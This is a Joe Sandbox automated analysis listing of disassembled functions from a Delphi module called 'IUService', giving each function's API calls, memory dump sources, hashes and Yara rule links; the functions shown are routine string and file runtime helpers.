                                                                                                                                            • Opcode ID: f0d280432ca972ea6fe1c2b580152eead50abd2acda08fe9b4d21eab7651e6ea
                                                                                                                                            • Instruction ID: 4a4c4bef56c973cbd5feeae4d951ec7c4dcbae2887cfb847883f1a9252908ba7
                                                                                                                                            • Opcode Fuzzy Hash: f0d280432ca972ea6fe1c2b580152eead50abd2acda08fe9b4d21eab7651e6ea
                                                                                                                                            • Instruction Fuzzy Hash: 5721AD70901BC18FF7209BB498A4B86B6E47B54324F860B2EEAC583252DBB5DC84CB55
                                                                                                                                            Function 5001C924 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@LastDelimiter$qqrx20System@UnicodeStringt1.RTL120(00000000,5001C9B7), ref: 5001C94D
                                                                                                                                              • Part of subcall function 5001C3F4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C430
                                                                                                                                              • Part of subcall function 5001C3F4: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C442
                                                                                                                                              • Part of subcall function 5001C3F4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C466
                                                                                                                                              • Part of subcall function 5001C3F4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C48D
                                                                                                                                              • Part of subcall function 5001C3F4: @Sysutils@StrScan$qqrpxbb.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C49C
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C9B7), ref: 5001C970
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,5001C9B7), ref: 5001C991
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001C9B7), ref: 5001C99C
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$System@@$String$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Sysutils@$Asg$qqrr20Char$qqrx20Copy$qqrx20Delimiter$qqrx20LastScan$qqrpxbbStringiiStringt1Stringx20
                                                                                                                                            • String ID: .\:
                                                                                                                                            • API String ID: 1552234271-496007442
                                                                                                                                            • Opcode ID: 3dc59a3a4042f2af38c8c9ff90ffa329698c3951d405d49f161df8a05a6a6c33
                                                                                                                                            • Instruction ID: 4b29117d5e5b6616636b4a21a03f3e77820cdaa5a79e53c5ecbb7995722f26fe
                                                                                                                                            • Opcode Fuzzy Hash: 3dc59a3a4042f2af38c8c9ff90ffa329698c3951d405d49f161df8a05a6a6c33
                                                                                                                                            • Instruction Fuzzy Hash: 6001D630A112C8EB9B11DFB9DD56CAEB3F9EF9632076043B6F400D3251DA70DE419691
                                                                                                                                            Function 5000D840 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 27COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@Close$qqrr15System@TTextRec.RTL120(00000000,5000D89E), ref: 5000D85E
                                                                                                                                              • Part of subcall function 50004E58: @System@SetInOutRes$qqri.RTL120(0000D7B1,?,50004A02,?,?,50004A3D), ref: 50004E90
                                                                                                                                            • @System@@Close$qqrr15System@TTextRec.RTL120(00000000,5000D89E), ref: 5000D868
                                                                                                                                              • Part of subcall function 50004E58: @System@SetInOutRes$qqri.RTL120(0000D7B1,?,50004A02,?,?,50004A3D), ref: 50004EA4
                                                                                                                                            • @System@@Close$qqrr15System@TTextRec.RTL120(00000000,5000D89E), ref: 5000D872
                                                                                                                                              • Part of subcall function 50003F0C: CloseHandle.KERNEL32(?,5000D87C,00000000,5000D89E), ref: 50003F1B
                                                                                                                                              • Part of subcall function 50003F0C: VirtualFree.KERNEL32(?,00000000,00008000,5000D87C,00000000,5000D89E), ref: 50003F4B
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(00000000,5000D89E), ref: 5000D881
                                                                                                                                              • Part of subcall function 500087A8: @System@@FreeMem$qqrpv.RTL120(?,50004445,5000444D), ref: 500087C4
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(00000000,5000D89E), ref: 5000D88B
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$System@$Close$qqrr15Text$Clr$qqrpvFreeRes$qqri$CloseHandleMem$qqrpvVirtual
                                                                                                                                            • String ID: 0CP$`@P
                                                                                                                                            • API String ID: 1074734335-699206834
                                                                                                                                            • Opcode ID: 5dd963d20aa9d17184e9b04b3596eb2fb7a121d5b3ae81a9c3fb34c116752437
                                                                                                                                            • Instruction ID: 65ae3e41759c052dc381d089f7c5f52dc025f958349b81aa71df701aec3d44ee
                                                                                                                                            • Opcode Fuzzy Hash: 5dd963d20aa9d17184e9b04b3596eb2fb7a121d5b3ae81a9c3fb34c116752437
                                                                                                                                            • Instruction Fuzzy Hash: 98E092795099C84B77867BE8783242D7698FFD6D143D24B63FD4486602CE38882157B7
                                                                                                                                            Function 50002918 Relevance: 12.2, APIs: 8, Instructions: 221sleepCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNEL32(00000000,?), ref: 500029AE
                                                                                                                                            • Sleep.KERNEL32(0000000A,00000000,?), ref: 500029C8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleep
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3472027048-0
                                                                                                                                            • Opcode ID: 7c45e2e85974a259c0a9710e2743f4c14eb2d2fa6527f7773eb08439326dd73a
                                                                                                                                            • Instruction ID: e297e28b8d4201adb38443583ce835d2b097a86928e3fdd3a1d09e16793e4692
                                                                                                                                            • Opcode Fuzzy Hash: 7c45e2e85974a259c0a9710e2743f4c14eb2d2fa6527f7773eb08439326dd73a
                                                                                                                                            • Instruction Fuzzy Hash: 5671F7316456808FF325CF68DD94B8ABBD0AF95314F94836EE9488B3D2D7B0E845C792
                                                                                                                                            Function 5001B690 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001B78E), ref: 5001B6D2
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001B78E), ref: 5001B6E0
                                                                                                                                              • Part of subcall function 50009D94: @System@@FreeMem$qqrpv.RTL120(5000D52A,?,00000000,5000D54A,?,?,?,?,00000000,?,5000D57B,?,?,50006AD6), ref: 50009DC3
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001B78E), ref: 5001B6FD
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001B78E), ref: 5001B725
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,5001B78E), ref: 5001B739
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,?,00000000,5001B78E), ref: 5001B743
                                                                                                                                            • CompareStringW.KERNEL32(00000400,00000001,00000000,?,00000000,?,00000000,5001B78E), ref: 5001B750
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$StringSystem@@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Asg$qqrr20Char$qqrx20InternalStringx20$CompareFreeMem$qqrpv
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2845561448-0
                                                                                                                                            • Opcode ID: bf0cfcdcd351cc12fb7600fa998fc1f6185d974cd3725ac41fa1c8af8d435e51
                                                                                                                                            • Instruction ID: 13f022dda2a44bd9837e8a7c0187e17156b0a537b5c6812678d5b7095c279c4f
                                                                                                                                            • Opcode Fuzzy Hash: bf0cfcdcd351cc12fb7600fa998fc1f6185d974cd3725ac41fa1c8af8d435e51
                                                                                                                                            • Instruction Fuzzy Hash: 0231A731A042899FDF01EFA4DD5299EFBF5EFD4310F1042A6E940A3295E7709E81C690
                                                                                                                                            Function 50016998 Relevance: 12.1, APIs: 8, Instructions: 87COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50016A76,?,?,?,?,00000000,00000000,00000000,00000000), ref: 500169BA
                                                                                                                                            • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,50016A76,?,?,?,?,00000000,00000000,00000000,00000000), ref: 500169FB
                                                                                                                                              • Part of subcall function 5000A1E4: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5000A202
                                                                                                                                            • @Sysutils@IntToStr$qqri.RTL120(00000000,50016A76,?,?,?,?,00000000,00000000,00000000,00000000), ref: 500169EF
                                                                                                                                              • Part of subcall function 5001B1C8: @System@@UStrFromPCharLen$qqrr20System@UnicodeStringpci.RTL120 ref: 5001B1DB
                                                                                                                                            • @Sysutils@IntToStr$qqri.RTL120(00000000,50016A76,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016A27
                                                                                                                                            • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,50016A76,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016A33
                                                                                                                                            • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,50016A76,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016A4A
                                                                                                                                            • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,50016A76,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016A56
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$System@@$Stringx20$Cat3$qqrr20Stringt2$Asg$qqrr20FromStr$qqriStringSysutils@$CharChar$qqrr20Len$qqrr20StringbStringpci
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2719714811-0
                                                                                                                                            • Opcode ID: abe00f2d5019f9ca9630ead1b1a181555649122de7a3af72321aa8d936361c12
                                                                                                                                            • Instruction ID: ea3395305638f272936f2b0549da07458c661ac4152f8a557e01a894cc4a250d
                                                                                                                                            • Opcode Fuzzy Hash: abe00f2d5019f9ca9630ead1b1a181555649122de7a3af72321aa8d936361c12
                                                                                                                                            • Instruction Fuzzy Hash: 0B21B0747022449BE708CE99DCA16AEB3E7EBCD300FA0863FF505D7341E675AD018694
                                                                                                                                            Function 5002B8AC Relevance: 12.1, APIs: 8, Instructions: 81COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002B982,?,?,?,?,?,?,5002B7F6,00000000,5002B80C,?,?,00000000), ref: 5002B8E6
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @Sysutils@TStringBuilder@set_Length$qqri.RTL120(00000000,5002B982,?,?,?,?,?,?,5002B7F6,00000000,5002B80C,?,?,00000000), ref: 5002B8FB
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002B982,?,?,?,?,?,?,5002B7F6,00000000,5002B80C,?,?,00000000), ref: 5002B918
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002B982,?,?,?,?,?,?,5002B7F6,00000000,5002B80C,?,?,00000000), ref: 5002B940
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5002B982,?,?,?,?,?,?,5002B7F6,00000000,5002B80C,?,?,00000000), ref: 5002B953
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120(00000000,5002B982,?,?,?,?,?,?,5002B7F6,00000000,5002B80C,?,?,00000000), ref: 5002B967
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: StringSystem@$System@@Unicode$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Builder@set_Char$qqrx20Length$qqriMove$qqrpxvpviSysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 509217649-0
                                                                                                                                            • Opcode ID: 57109080cef9c16d1e5caa8776740e072df40173a5d0d8d2589dbaaf05c1b2f2
                                                                                                                                            • Instruction ID: 4776b8aa2b7f85fb9c844d62bdb1f3a0b78aa5720451edc0d99c7a6c12b062e9
                                                                                                                                            • Opcode Fuzzy Hash: 57109080cef9c16d1e5caa8776740e072df40173a5d0d8d2589dbaaf05c1b2f2
                                                                                                                                            • Instruction Fuzzy Hash: AD218330B02186DF9F11EF78E95186DB3F9EF8430076142A6E64497215EB30EF41D780
                                                                                                                                            Function 5000A1E4 Relevance: 12.1, APIs: 8, Instructions: 79COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5000A202
                                                                                                                                              • Part of subcall function 50009D40: @System@@NewUnicodeString$qqri.RTL120(00000000,?,50004742), ref: 50009D5B
                                                                                                                                              • Part of subcall function 50009D40: @System@Move$qqrpxvpvi.RTL120(00000000,?,50004742), ref: 50009D69
                                                                                                                                              • Part of subcall function 50009D40: @System@@FreeMem$qqrpv.RTL120(50004742), ref: 50009D8B
                                                                                                                                            • @System@@NewUnicodeString$qqri.RTL120 ref: 5000A227
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000), ref: 5000A23B
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120(00000000), ref: 5000A253
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000), ref: 5000A263
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120(00000000), ref: 5000A279
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(00000000), ref: 5000A287
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5000A297
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Unicode$System@@$Asg$qqrr20StringStringx20$Move$qqrpxvpvi$String$qqri$Clr$qqrpvFreeMem$qqrpv
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 628645394-0
                                                                                                                                            • Opcode ID: 43e4a635c658f9d3ccd16e17d2eed1da22889dcf8d4b35ef7c0074040d58dafa
                                                                                                                                            • Instruction ID: a5e17d5f5a6bf6054f8e727ea2d10013107e8b22956fef989289cb67f68bf60a
                                                                                                                                            • Opcode Fuzzy Hash: 43e4a635c658f9d3ccd16e17d2eed1da22889dcf8d4b35ef7c0074040d58dafa
                                                                                                                                            • Instruction Fuzzy Hash: 3021B7307065A04BFB14AB5DD4B2A2EF3E69FD5100BE4872BA644CB306DA75CC41C392
                                                                                                                                            Function 50028754 Relevance: 12.1, APIs: 8, Instructions: 78COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50028822), ref: 5002879B
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50028822), ref: 500287C3
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50028822), ref: 500287D7
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,?,00000000,50028822), ref: 500287E0
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50028822), ref: 500287F6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: StringSystem@System@@Unicode$AnsiChar$qqrx20FromStr$qqrr20Stringx27System@%T$us$i0$%$Internal
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1771006815-0
                                                                                                                                            • Opcode ID: 776671bc0eec5f129ae3a97f8df4fb0cf3bb1fa82ad82360c3030aec5ea0138b
                                                                                                                                            • Instruction ID: dc23fba009a07f5ee1e34ee886edddc6a55f2f6ed9e61d9879787caccd6cdf4c
                                                                                                                                            • Opcode Fuzzy Hash: 776671bc0eec5f129ae3a97f8df4fb0cf3bb1fa82ad82360c3030aec5ea0138b
                                                                                                                                            • Instruction Fuzzy Hash: 7E219835A022969FDF01DFB8EC9195EB7F9EF54200FA14676E504A3255EB70EE41C780
                                                                                                                                            Function 50015614 Relevance: 12.1, APIs: 8, Instructions: 75COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500156E2), ref: 50015657
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500156E2), ref: 5001567F
                                                                                                                                            • @Sysutils@ByteType$qqrx20System@UnicodeStringi.RTL120(00000000,500156E2), ref: 5001569F
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,500156E2), ref: 500156AB
                                                                                                                                            • @Sysutils@AnsiStrIComp$qqrpbt1.RTL120(00000000,500156E2), ref: 500156B7
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
